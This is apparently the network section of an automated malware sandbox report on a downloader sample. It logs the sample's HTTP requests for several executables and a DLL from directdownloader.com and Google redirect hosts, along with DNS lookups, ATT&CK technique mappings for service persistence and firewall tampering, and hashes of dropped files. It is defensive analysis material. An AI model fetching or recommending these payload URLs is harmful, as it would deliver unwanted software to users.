Connection: Keep-Alive
Host: workspace.google.com

Response

HTTP/1.1 404 Not Found

Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Date: Mon, 15 Jul 2024 11:31:19 GMT
Server: sffe
Content-Length: 159708
X-XSS-Protection: 0
Set-Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E; expires=Tue, 14-Jan-2025 11:31:19 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://workspace.google.com/products.html/stub/OpenCL.dll

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.110:443

Request

GET /products.html/stub/OpenCL.dll HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: workspace.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 404 Not Found

Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=ISO-8859-1
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Date: Mon, 15 Jul 2024 11:31:20 GMT
Server: sffe
Content-Length: 159708
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://workspace.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.110:443

Request

GET /products.html/toolbars/BitAcceleratorDDLRinstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: workspace.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 404 Not Found

Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=ISO-8859-1
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Date: Mon, 15 Jul 2024 11:31:20 GMT
Server: sffe
Content-Length: 159708
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://workspace.google.com/products.html/toolbars/optimizer.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.110:443

Request

GET /products.html/toolbars/optimizer.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: workspace.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 404 Not Found

Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=ISO-8859-1
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Date: Mon, 15 Jul 2024 11:31:20 GMT
Server: sffe
Content-Length: 159708
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://workspace.google.com/products.html/DirectDownloaderInstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.110:443

Request

GET /products.html/DirectDownloaderInstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: workspace.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 404 Not Found

Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=ISO-8859-1
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Date: Mon, 15 Jul 2024 11:31:20 GMT
Server: sffe
Content-Length: 159708
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

78.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.169.217.172.in-addr.arpa

IN PTR

Response

78.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f141e100net
DNS

78.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.204.58.216.in-addr.arpa

IN PTR

Response

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f781e100net

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f14�H

78.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f14�H
DNS

110.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

110.201.58.216.in-addr.arpa

IN PTR

Response

110.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f141e100net

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f110�I

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f14�I
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response

162.255.119.249:80

http://www.directdownloader.com/DirectDownloaderInstaller.exe

http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

1.5kB
2.4kB
20
8

HTTP Request

GET http://www.directdownloader.com/stub/stub_ddlr.exe

HTTP Response

302

HTTP Request

GET http://www.directdownloader.com/stub/OpenCL.dll

HTTP Response

302

HTTP Request

GET http://www.directdownloader.com/toolbars/BitAcceleratorDDLRinstaller.exe

HTTP Response

302

HTTP Request

GET http://www.directdownloader.com/toolbars/optimizer.exe

HTTP Response

302

HTTP Request

GET http://www.directdownloader.com/DirectDownloaderInstaller.exe

HTTP Response

302
142.250.180.4:80

http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

2.2kB
3.9kB
14
8

HTTP Request

GET http://www.google.com/enterprise/apps/business/products.html/stub/stub_ddlr.exe

HTTP Response

301

HTTP Request

GET http://www.google.com/enterprise/apps/business/products.html/stub/OpenCL.dll

HTTP Response

301

HTTP Request

GET http://www.google.com/enterprise/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

HTTP Response

301

HTTP Request

GET http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe

HTTP Response

301

HTTP Request

GET http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

HTTP Response

301
172.217.169.78:443

https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe

tls, http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

3.0kB
11.1kB
22
15

HTTP Request

GET https://enterprise.google.com/apps/business/products.html/stub/stub_ddlr.exe

HTTP Response

301

HTTP Request

GET https://enterprise.google.com/apps/business/products.html/stub/OpenCL.dll

HTTP Response

301

HTTP Request

GET https://enterprise.google.com/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

HTTP Response

301

HTTP Request

GET https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe

HTTP Response

301

HTTP Request

GET https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe

HTTP Response

301
216.58.201.99:80

http://c.pki.goog/r/r1.crl

http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

395 B
1.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
216.58.201.99:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94

http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

509 B
885 B
6
4

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94

HTTP Response

200
216.58.204.78:443

https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe

tls, http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

2.9kB
11.0kB
22
14

HTTP Request

GET https://gsuite.google.com/products.html/stub/stub_ddlr.exe

HTTP Response

301

HTTP Request

GET https://gsuite.google.com/products.html/stub/OpenCL.dll

HTTP Response

301

HTTP Request

GET https://gsuite.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

HTTP Response

301

HTTP Request

GET https://gsuite.google.com/products.html/toolbars/optimizer.exe

HTTP Response

301

HTTP Request

GET https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe

HTTP Response

301
216.58.201.110:443

https://workspace.google.com/products.html/DirectDownloaderInstaller.exe

tls, http

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

31.0kB
851.0kB
633
630

HTTP Request

GET https://workspace.google.com/products.html/stub/stub_ddlr.exe

HTTP Response

404

HTTP Request

GET https://workspace.google.com/products.html/stub/OpenCL.dll

HTTP Response

404

HTTP Request

GET https://workspace.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

HTTP Response

404

HTTP Request

GET https://workspace.google.com/products.html/toolbars/optimizer.exe

HTTP Response

404

HTTP Request

GET https://workspace.google.com/products.html/DirectDownloaderInstaller.exe

HTTP Response

404

8.8.8.8:53

73.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

73.159.190.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

www.directdownloader.com

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

70 B
86 B
1
1

DNS Request

www.directdownloader.com

DNS Response

162.255.119.249
8.8.8.8:53

www.google.com

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

enterprise.google.com

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

67 B
104 B
1
1

DNS Request

enterprise.google.com

DNS Response

172.217.169.78
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

249.119.255.162.in-addr.arpa

dns

74 B
154 B
1
1

DNS Request

249.119.255.162.in-addr.arpa
8.8.8.8:53

4.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

4.180.250.142.in-addr.arpa
8.8.8.8:53

c.pki.goog

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

216.58.201.99
8.8.8.8:53

o.pki.goog

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

216.58.201.99
8.8.8.8:53

gsuite.google.com

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

63 B
79 B
1
1

DNS Request

gsuite.google.com

DNS Response

216.58.204.78
8.8.8.8:53

workspace.google.com

dns

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

66 B
82 B
1
1

DNS Request

workspace.google.com

DNS Response

216.58.201.110
8.8.8.8:53

78.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

78.169.217.172.in-addr.arpa
8.8.8.8:53

78.204.58.216.in-addr.arpa

dns

72 B
171 B
1
1

DNS Request

78.204.58.216.in-addr.arpa
8.8.8.8:53

110.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

110.201.58.216.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe

Filesize
7B

MD5
824ab679eea19c5b43b186800c2c625f

SHA1
f8b90bc89117ac4f1a272e7acef952a79a64b617

SHA256
f6d4a23bd6b412e4d4906cbd1c56dcbcf5ddd96b6a9098ceba96be94e52f7ab3

SHA512
e13bb9c005c2acb412916bf0f4a37b39c2800298042d5344b877143d1b767342903c9bb3e8d4eda75f37cc323b5f623d6bf34629d2c999c7df316de4ffd3caf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\stub_ddlr.exe

Filesize
155KB

MD5
e1098470152dc10fb29b3ad7b4e5f5cf

SHA1
ae5a796340be8f0912d6c85f81dce21211aaaf15

SHA256
3832d19f80a84069c5010266fa3cf11eee5bb1c3d1b2ba278e49519519561b8a

SHA512
0ba3a53a3021be99aaf5cf8af54f214feea0f80f112a7ffb209b4c2c0539f8b8b6cd087ba7ed6501c9b79e0a9496494e471ac43f9b7f0aacf58866c01e90e7c6

Download Submit
memory/4740-24-0x0000000000400000-0x00000000004C3000-memory.dmp

Filesize
780KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response